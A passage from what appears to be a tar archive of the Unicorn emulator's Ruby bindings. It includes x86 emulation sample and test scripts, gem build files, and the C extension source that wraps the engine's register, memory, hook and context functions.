puts("ERROR: %s" % e) end # now print out some registers puts(">>> Emulation done. Below is the CPU context") rax = mu.reg_read(UC_X86_REG_RAX) rbx = mu.reg_read(UC_X86_REG_RBX) rcx = mu.reg_read(UC_X86_REG_RCX) rdx = mu.reg_read(UC_X86_REG_RDX) rsi = mu.reg_read(UC_X86_REG_RSI) rdi = mu.reg_read(UC_X86_REG_RDI) r8 = mu.reg_read(UC_X86_REG_R8) r9 = mu.reg_read(UC_X86_REG_R9) r10 = mu.reg_read(UC_X86_REG_R10) r11 = mu.reg_read(UC_X86_REG_R11) r12 = mu.reg_read(UC_X86_REG_R12) r13 = mu.reg_read(UC_X86_REG_R13) r14 = mu.reg_read(UC_X86_REG_R14) r15 = mu.reg_read(UC_X86_REG_R15) puts(">>> RAX = %d" % rax) puts(">>> RBX = %d" % rbx) puts(">>> RCX = %d" % rcx) puts(">>> RDX = %d" % rdx) puts(">>> RSI = %d" % rsi) puts(">>> RDI = %d" % rdi) puts(">>> R8 = %d" % r8) puts(">>> R9 = %d" % r9) puts(">>> R10 = %d" % r10) puts(">>> R11 = %d" % r11) puts(">>> R12 = %d" % r12) puts(">>> R13 = %d" % r13) puts(">>> R14 = %d" % r14) puts(">>> R15 = %d" % r15) #BUG mu.emu_start(ADDRESS, ADDRESS + X86_CODE64.bytesize) rescue UcError => e puts("ERROR: %s" % e) end end def test_x86_64_syscall() puts("Emulate x86_64 code with 'syscall' instruction") begin # Initialize emulator in X86-64bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_64 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE64_SYSCALL) hook_syscall = Proc.new do |mu, user_data| rax = mu.reg_read(UC_X86_REG_RAX) if rax == 0x100 mu.reg_write(UC_X86_REG_RAX, 0x200) else puts('ERROR: was not expecting rax=%d in syscall' % rax) end end # hook interrupts for syscall mu.hook_add(UC_HOOK_INSN, hook_syscall, nil, 1, 0, UC_X86_INS_SYSCALL) # syscall handler is expecting rax=0x100 mu.reg_write(UC_X86_REG_RAX, 0x100) begin # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE64_SYSCALL.bytesize) rescue UcError => e puts("ERROR: %s" % e) end # now print out some registers puts(">>> Emulation done. Below is the CPU context") rax = mu.reg_read(UC_X86_REG_RAX) puts(">>> RAX = 0x%x" % rax) rescue UcError => e puts("ERROR: %s" % e) end end def test_x86_16() puts("Emulate x86 16-bit code") begin # Initialize emulator in X86-16bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_16 # map 8KB memory for this emulation mu.mem_map(0, 8 * 1024) # set CPU registers mu.reg_write(UC_X86_REG_EAX, 7) mu.reg_write(UC_X86_REG_EBX, 5) mu.reg_write(UC_X86_REG_ESI, 6) # write machine code to be emulated to memory mu.mem_write(0, X86_CODE16) # emulate machine code in infinite time mu.emu_start(0, X86_CODE16.bytesize) # now print out some registers puts(">>> Emulation done. Below is the CPU context") tmp = mu.mem_read(11, 1) puts("[0x%x] = 0x%x" % [11, tmp[0].ord]) rescue UcError => e puts("ERROR: %s" % e) end end test_i386() puts("=" * 20) test_i386_loop() puts("=" * 20) test_i386_invalid_mem_read() puts("=" * 20) test_i386_invalid_mem_write() puts("=" * 20) test_i386_context_save() puts("=" * 20) test_i386_inout() puts("=" * 20) test_x86_64() puts("=" * 20) test_x86_64_syscall() puts("=" * 20) test_x86_16() �������������������unicorn-2.1.1/bindings/ruby/sample_x86_gdt.rb�������������������������������������������������������0000664�0000000�0000000�00000004512�14675241067�0021135�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby require 'unicorn_engine' require 'unicorn_engine/x86_const' include UnicornEngine F_GRANULARITY = 0x8 F_PROT_32 = 0x4 F_LONG = 0x2 F_AVAILABLE = 0x1 A_PRESENT = 0x80 A_PRIV_3 = 0x60 A_PRIV_2 = 0x40 A_PRIV_1 = 0x20 A_PRIV_0 = 0x0 A_CODE = 0x8 A_DATA = 0x0 A_TSS = 0x0 A_GATE = 0x0 A_DATA_WRITABLE = 0x2 A_CODE_READABLE = 0x2 A_DIR_CON_BIT = 0x4 S_GDT = 0x0 S_LDT = 0x4 S_PRIV_3 = 0x3 S_PRIV_2 = 0x2 S_PRIV_1 = 0x1 S_PRIV_0 = 0x0 def create_selector(idx, flags) to_ret = flags to_ret |= idx << 3 return to_ret end def create_gdt_entry(base, limit, access, flags) to_ret = limit & 0xffff; to_ret |= (base & 0xffffff) << 16; to_ret |= (access & 0xff) << 40; to_ret |= ((limit >> 16) & 0xf) << 48; to_ret |= (flags & 0xff) << 52; to_ret |= ((base >> 24) & 0xff) << 56; return [to_ret].pack('Q') end def write_gdt(uc, gdt, mem) gdt.each_index do |idx| offset = idx * GDT_ENTRY_SIZE uc.mem_write(mem + offset, gdt[idx]) end end CODE_ADDR = 0x40000 CODE_SIZE = 0x1000 GDT_ADDR = 0x3000 GDT_LIMIT = 0x1000 GDT_ENTRY_SIZE = 0x8 GS_SEGMENT_ADDR = 0x5000 GS_SEGMENT_SIZE = 0x1000 uc = Uc.new UC_ARCH_X86, UC_MODE_32 uc.mem_map(GDT_ADDR, GDT_LIMIT) uc.mem_map(GS_SEGMENT_ADDR, GS_SEGMENT_SIZE) uc.mem_map(CODE_ADDR, CODE_SIZE) gdt = Array.new (31) {|i| create_gdt_entry(0,0,0,0)} gdt[15] = create_gdt_entry(GS_SEGMENT_ADDR, GS_SEGMENT_SIZE, A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) gdt[16] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) # Data Segment gdt[17] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_CODE | A_CODE_READABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) # Code Segment gdt[18] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_0 | A_DIR_CON_BIT, F_PROT_32) # Stack Segment write_gdt(uc, gdt, GDT_ADDR) uc.reg_write(UC_X86_REG_GDTR, [0, GDT_ADDR, gdt.length * GDT_ENTRY_SIZE-1, 0x0]) selector = create_selector(15, S_GDT | S_PRIV_3) uc.reg_write(UC_X86_REG_GS, selector) selector = create_selector(16, S_GDT | S_PRIV_3) uc.reg_write(UC_X86_REG_DS, selector) selector = create_selector(17, S_GDT | S_PRIV_3) uc.reg_write(UC_X86_REG_CS, selector) selector = create_selector(18, S_GDT | S_PRIV_0) uc.reg_write(UC_X86_REG_SS, selector) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/test_hook_gc.rb���������������������������������������������������������0000664�0000000�0000000�00000002763�14675241067�0020767�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby require 'unicorn_engine' require 'unicorn_engine/x86_const' require 'weakref' include UnicornEngine X86_CODE32 = "\x41" # INC ecx; DEC edx # memory address where emulation starts ADDRESS = 0x1000000 # callback for tracing instructions hook_code = Proc.new do |uc, address, size, user_data| puts("proc was run") end hook_code_weak = WeakRef.new hook_code begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) hook_code = nil # erase reference to proc GC.start() # force garbage collection to test if proc is garbage collected # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize) mu = nil # erase reference to Uc because apparently it doesn't go out of scope after this? rescue UcError => e puts("ERROR: %s" % e) exit 1 rescue NoMethodError => e puts("proc was garbage collected and we tried to invoke `call` on something strange") exit 1 end GC.start() if hook_code_weak.weakref_alive?() then puts("proc was not garbage collected") exit 1 end puts "test passed" exit 0 �������������unicorn-2.1.1/bindings/ruby/unicorn_gem/������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0020267�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/Gemfile�����������������������������������������������������0000664�0000000�0000000�00000000047�14675241067�0021563�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������source 'https://rubygems.org' gemspec �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/Rakefile����������������������������������������������������0000664�0000000�0000000�00000000063�14675241067�0021733�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������require "bundler/gem_tasks" task :default => :spec �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/ext/��������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0021067�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/ext/extconf.rb����������������������������������������������0000664�0000000�0000000�00000000235�14675241067�0023062�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������require 'mkmf' extension_name = 'unicorn_engine' dir_config(extension_name) pkg_config('unicorn') have_library('unicorn') create_makefile(extension_name) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/ext/types.h�������������������������������������������������0000664�0000000�0000000�00000001557�14675241067�0022414�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Ruby bindings for the Unicorn Emulator Engine Copyright(c) 2016 Sascha Schirra This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ typedef struct uc_x86_float80 { uint64_t mantissa; uint16_t exponent; } uc_x86_float80; struct hook { uc_hook trace; VALUE cb; VALUE ud; VALUE rUc; }; �������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/ext/unicorn.c�����������������������������������������������0000664�0000000�0000000�00000044542�14675241067�0022721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Ruby bindings for the Unicorn Emulator Engine Copyright(c) 2016 Sascha Schirra This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #include "ruby.h" #include <unicorn/unicorn.h> #include <unicorn/x86.h> #include "unicorn.h" #include "types.h" VALUE UnicornModule = Qnil; VALUE UcClass = Qnil; VALUE UcError = Qnil; VALUE SavedContext = Qnil; VALUE Hook = Qnil; void Init_unicorn_engine(void) { rb_require("unicorn_engine/unicorn_const"); UnicornModule = rb_define_module("UnicornEngine"); UcError = rb_define_class_under(UnicornModule, "UcError", rb_eStandardError); SavedContext = rb_define_class_under(UnicornModule, "SavedContext", rb_cObject); Hook = rb_define_class_under(UnicornModule, "Hook", rb_cObject); UcClass = rb_define_class_under(UnicornModule, "Uc", rb_cObject); rb_define_method(UcClass, "initialize", m_uc_initialize, 2); rb_define_method(UcClass, "emu_start", m_uc_emu_start, -1); rb_define_method(UcClass, "emu_stop", m_uc_emu_stop, 0); rb_define_method(UcClass, "reg_read", m_uc_reg_read, 1); rb_define_method(UcClass, "reg_write", m_uc_reg_write, 2); rb_define_method(UcClass, "mem_read", m_uc_mem_read, 2); rb_define_method(UcClass, "mem_write", m_uc_mem_write, 2); rb_define_method(UcClass, "mem_map", m_uc_mem_map, -1); rb_define_method(UcClass, "mem_unmap", m_uc_mem_unmap, 2); rb_define_method(UcClass, "mem_protect", m_uc_mem_protect, 3); rb_define_method(UcClass, "hook_add", m_uc_hook_add, -1); rb_define_method(UcClass, "hook_del", m_uc_hook_del, 1); rb_define_method(UcClass, "query", m_uc_query, 1); rb_define_method(UcClass, "context_save", m_uc_context_save, 0); rb_define_method(UcClass, "context_update", m_uc_context_update, 1); rb_define_method(UcClass, "context_restore", m_uc_context_restore, 1); } VALUE m_uc_initialize(VALUE self, VALUE arch, VALUE mode) { uc_engine *_uc; uc_err err; err = uc_open(NUM2INT(arch), NUM2INT(mode), &_uc); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } VALUE uc = Data_Wrap_Struct(UcClass, 0, uc_close, _uc); rb_iv_set(self, "@uch", uc); rb_iv_set(self, "@hooks", rb_ary_new()); return self; } VALUE m_uc_emu_start(int argc, VALUE* argv, VALUE self){ VALUE begin; VALUE until; VALUE timeout; VALUE count; uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); rb_scan_args(argc, argv, "22",&begin, &until, &timeout, &count); if (NIL_P(timeout)) timeout = INT2NUM(0); if (NIL_P(count)) count = INT2NUM(0); err = uc_emu_start(_uc, NUM2ULL(begin), NUM2ULL(until), NUM2INT(timeout), NUM2INT(count)); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } VALUE m_uc_emu_stop(VALUE self){ uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); err = uc_emu_stop(_uc); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } VALUE m_uc_reg_read(VALUE self, VALUE reg_id){ uc_err err; int32_t tmp_reg = NUM2INT(reg_id); int64_t reg_value = 0; VALUE to_ret; uc_x86_mmr mmr; uc_x86_float80 float80; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); uc_arch arch; uc_query(_uc, UC_QUERY_ARCH, &arch); if(arch == UC_ARCH_X86) { switch(tmp_reg){ case UC_X86_REG_GDTR: case UC_X86_REG_IDTR: case UC_X86_REG_LDTR: case UC_X86_REG_TR: mmr.selector = 0; mmr.base = 0; mmr.limit = 0; mmr.flags = 0; err = uc_reg_read(_uc, tmp_reg, &mmr); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } VALUE mmr_ary = rb_ary_new(); reg_value = mmr.selector; rb_ary_store(mmr_ary, 0, UINT2NUM(reg_value)); rb_ary_store(mmr_ary, 1, ULL2NUM(mmr.base)); rb_ary_store(mmr_ary, 2, UINT2NUM(mmr.limit)); rb_ary_store(mmr_ary, 3, UINT2NUM(mmr.flags)); return mmr_ary; case UC_X86_REG_FP0: case UC_X86_REG_FP1: case UC_X86_REG_FP2: case UC_X86_REG_FP3: case UC_X86_REG_FP4: case UC_X86_REG_FP5: case UC_X86_REG_FP6: case UC_X86_REG_FP7: float80.mantissa = 0; float80.exponent = 0; err = uc_reg_read(_uc, tmp_reg, &float80); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } VALUE float80_ary = rb_ary_new(); rb_ary_store(float80_ary, 0, ULL2NUM(float80.mantissa)); rb_ary_store(float80_ary, 1, UINT2NUM(float80.exponent)); return float80_ary; } } if(arch == UC_ARCH_ARM64) { // V & Q registers are the same if(tmp_reg >= UC_ARM64_REG_V0 && tmp_reg <= UC_ARM64_REG_V31) { tmp_reg += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; } if(tmp_reg >= UC_ARM64_REG_Q0 && tmp_reg <= UC_ARM64_REG_Q31) { uint64_t neon128_value[2]; err = uc_reg_read(_uc, tmp_reg, &neon128_value); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } VALUE float128_ary = rb_ary_new(); rb_ary_store(float128_ary, 0, ULL2NUM(neon128_value[0])); rb_ary_store(float128_ary, 1, ULL2NUM(neon128_value[1])); return float128_ary; } } err = uc_reg_read(_uc, tmp_reg, ®_value); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return ULL2NUM(reg_value); } VALUE m_uc_reg_write(VALUE self, VALUE reg_id, VALUE reg_value){ uc_err err; int32_t tmp_reg = NUM2INT(reg_id); uc_x86_mmr mmr; uc_x86_float80 float80; int64_t tmp; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); uc_arch arch; uc_query(_uc, UC_QUERY_ARCH, &arch); if(arch == UC_ARCH_X86) { switch(tmp_reg){ case UC_X86_REG_GDTR: case UC_X86_REG_IDTR: case UC_X86_REG_LDTR: case UC_X86_REG_TR: Check_Type(reg_value, T_ARRAY); mmr.selector = NUM2USHORT(rb_ary_entry(reg_value,0)); mmr.base = NUM2ULL(rb_ary_entry(reg_value,1)); mmr.limit = NUM2UINT(rb_ary_entry(reg_value,2)); mmr.flags = NUM2UINT(rb_ary_entry(reg_value,3)); err = uc_reg_write(_uc, tmp_reg, &mmr); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; case UC_X86_REG_FP0: case UC_X86_REG_FP1: case UC_X86_REG_FP2: case UC_X86_REG_FP3: case UC_X86_REG_FP4: case UC_X86_REG_FP5: case UC_X86_REG_FP6: case UC_X86_REG_FP7: Check_Type(reg_value, T_ARRAY); float80.mantissa = NUM2ULL(rb_ary_entry(reg_value,0)); float80.exponent = NUM2USHORT(rb_ary_entry(reg_value,1)); err = uc_reg_write(_uc, tmp_reg, &float80); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } } if(arch == UC_ARCH_ARM64) { // V & Q registers are the same if(tmp_reg >= UC_ARM64_REG_V0 && tmp_reg <= UC_ARM64_REG_V31) { tmp_reg += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; } if(tmp_reg >= UC_ARM64_REG_Q0 && tmp_reg <= UC_ARM64_REG_Q31) { Check_Type(reg_value, T_ARRAY); uint64_t neon128_value[2]; neon128_value[0] = NUM2ULL(rb_ary_entry(reg_value, 0)); neon128_value[1] = NUM2ULL(rb_ary_entry(reg_value, 1)); err = uc_reg_write(_uc, NUM2INT(reg_id), &neon128_value); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } } tmp = NUM2ULL(reg_value); err = uc_reg_write(_uc, NUM2INT(reg_id), &tmp); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } VALUE m_uc_mem_read(VALUE self, VALUE address, VALUE size){ size_t isize = NUM2UINT(size); uint8_t bytes[isize]; uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); err = uc_mem_read(_uc, NUM2ULL(address), &bytes, isize); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return rb_str_new(bytes, isize); } VALUE m_uc_mem_write(VALUE self, VALUE address, VALUE bytes){ uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); err = uc_mem_write(_uc, NUM2ULL(address), StringValuePtr(bytes), RSTRING_LEN(bytes)); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } VALUE m_uc_mem_map(int argc, VALUE* argv, VALUE self){ uc_err err; VALUE address; VALUE size; VALUE perms; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); rb_scan_args(argc, argv, "21",&address, &size, &perms); if (NIL_P(perms)) perms = INT2NUM(UC_PROT_ALL); err = uc_mem_map(_uc, NUM2ULL(address), NUM2UINT(size), NUM2UINT(perms)); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } VALUE m_uc_mem_unmap(VALUE self, VALUE address, VALUE size){ uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc); err = uc_mem_unmap(_uc, NUM2ULL(address), NUM2UINT(size)); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } VALUE m_uc_mem_protect(VALUE self, VALUE address, VALUE size, VALUE perms){ uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); err = uc_mem_protect(_uc, NUM2ULL(address), NUM2UINT(size), NUM2UINT(perms)); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } static void cb_hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data){ struct hook *hook = (struct hook *)user_data; VALUE cb; VALUE ud; VALUE rUc; cb = hook->cb; ud = hook->ud; rUc = hook->rUc; rb_funcall(cb, rb_intern("call"), 4, rUc, ULL2NUM(address), UINT2NUM(size), ud); } static void cb_hook_mem_access(uc_engine *uc, uint32_t access, uint64_t address, uint32_t size, int64_t value, void *user_data){ struct hook *hook = (struct hook *)user_data; VALUE cb; VALUE ud; VALUE rUc; cb = hook->cb; ud = hook->ud; rUc = hook->rUc; rb_funcall(cb, rb_intern("call"), 6, rUc, UINT2NUM(access), ULL2NUM(address), UINT2NUM(size), LL2NUM(value), ud); } static bool cb_hook_mem_invalid(uc_engine *uc, uint32_t access, uint64_t address, uint32_t size, int64_t value, void *user_data){ struct hook *hook = (struct hook *)user_data; VALUE cb; VALUE ud; VALUE rUc; cb = hook->cb; ud = hook->ud; rUc = hook->rUc; return RTEST(rb_funcall(cb, rb_intern("call"), 6, rUc, UINT2NUM(access), ULL2NUM(address), UINT2NUM(size), LL2NUM(value), ud)); } static uint32_t cb_hook_insn_in(uc_engine *uc, uint32_t port, int size, void *user_data){ struct hook *hook = (struct hook *)user_data; VALUE cb; VALUE ud; VALUE rUc; cb = hook->cb; ud = hook->ud; rUc = hook->rUc; return NUM2UINT(rb_funcall(cb, rb_intern("call"), 4, rUc, UINT2NUM(port), INT2NUM(size), ud)); } static void cb_hook_insn_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data){ struct hook *hook = (struct hook *)user_data; VALUE cb; VALUE ud; VALUE rUc; cb = hook->cb; ud = hook->ud; rUc = hook->rUc; rb_funcall(cb, rb_intern("call"), 5, rUc, UINT2NUM(port), INT2NUM(size), UINT2NUM(value), ud); } static void cb_hook_insn_syscall(uc_engine *uc, void *user_data){ struct hook *hook = (struct hook *)user_data; VALUE cb; VALUE ud; VALUE rUc; cb = hook->cb; ud = hook->ud; rUc = hook->rUc; rb_funcall(cb, rb_intern("call"), 2, rUc, ud); } static void cb_hook_intr(uc_engine *uc, uint32_t intno, void *user_data){ struct hook *hook = (struct hook *)user_data; VALUE cb; VALUE ud; VALUE rUc; cb = hook->cb; ud = hook->ud; rUc = hook->rUc; rb_funcall(cb, rb_intern("call"), 3, rUc, ULL2NUM(intno), ud); } static void mark_hook(void *p){ struct hook *hook = (struct hook *)p; rb_gc_mark(hook->cb); rb_gc_mark(hook->ud); rb_gc_mark(hook->rUc); // just for completeness sake even though this should already be marked } VALUE m_uc_hook_add(int argc, VALUE* argv, VALUE self){ VALUE hook_type; VALUE callback; VALUE user_data; VALUE begin; VALUE end; VALUE arg1; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc); rb_scan_args(argc, argv, "24",&hook_type, &callback, &user_data, &begin, &end, &arg1); if (NIL_P(begin)) begin = ULL2NUM(1); if (NIL_P(end)) end = ULL2NUM(0); if (NIL_P(arg1)) arg1 = INT2NUM(0); uc_err err; if (rb_class_of(callback) != rb_cProc) rb_raise(UcError, "Expected Proc callback"); struct hook *hook = (struct hook *)malloc(sizeof(struct hook)); hook->cb = callback; hook->ud = user_data; hook->rUc = self; VALUE r_hook; VALUE hooks_list; r_hook = Data_Wrap_Struct(Hook, mark_hook, free, hook); hooks_list = rb_iv_get(self, "@hooks"); rb_ary_push(hooks_list, r_hook); uint32_t htype = NUM2UINT(hook_type); if(htype == UC_HOOK_INSN){ switch(NUM2INT(arg1)){ case UC_X86_INS_IN: err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_in,(void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1)); break; case UC_X86_INS_OUT: err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_out,(void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1)); break; case UC_X86_INS_SYSCALL: case UC_X86_INS_SYSENTER: err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_syscall,(void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1)); break; } } else if(htype == UC_HOOK_INTR){ err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_intr,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); } else if(htype == UC_HOOK_CODE || htype == UC_HOOK_BLOCK){ err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_code,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); } else if (htype & UC_HOOK_MEM_READ_UNMAPPED || htype & UC_HOOK_MEM_WRITE_UNMAPPED || htype & UC_HOOK_MEM_FETCH_UNMAPPED || htype & UC_HOOK_MEM_READ_PROT || htype & UC_HOOK_MEM_WRITE_PROT || htype & UC_HOOK_MEM_FETCH_PROT || htype & UC_HOOK_MEM_READ_INVALID || htype & UC_HOOK_MEM_WRITE_INVALID || htype & UC_HOOK_MEM_FETCH_INVALID || htype & UC_HOOK_MEM_UNMAPPED || htype & UC_HOOK_MEM_PROT || htype & UC_HOOK_MEM_INVALID) { err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_mem_invalid,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); } else{ err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_mem_access,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); } if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return r_hook; } VALUE m_uc_hook_del(VALUE self, VALUE hook){ uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); struct hook *h; Data_Get_Struct(hook, struct hook, h); err = uc_hook_del(_uc, h->trace); rb_ary_delete(rb_iv_get(self, "@hooks"), hook); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } VALUE m_uc_query(VALUE self, VALUE query_mode){ int qm = NUM2INT(query_mode); size_t result; uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); err = uc_query(_uc, qm, &result); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return INT2NUM(result); } VALUE m_uc_context_save(VALUE self){ uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); uc_context *_context; err = uc_context_alloc(_uc, &_context); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } err = uc_context_save(_uc, _context); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } VALUE sc = Data_Wrap_Struct(SavedContext, 0, uc_free, _context); return sc; } VALUE m_uc_context_update(VALUE self, VALUE context){ uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); uc_context *_context; Data_Get_Struct(context, uc_context, _context); err = uc_context_save(_uc, _context); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } VALUE m_uc_context_restore(VALUE self, VALUE context){ uc_err err; uc_engine *_uc; Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); uc_context *_context; Data_Get_Struct(context, uc_context, _context); err = uc_context_restore(_uc, _context); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } return Qnil; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/ext/unicorn.h�����������������������������������������������0000664�0000000�0000000�00000003053�14675241067�0022716�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Ruby bindings for the Unicorn Emulator Engine Copyright(c) 2016 Sascha Schirra This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, 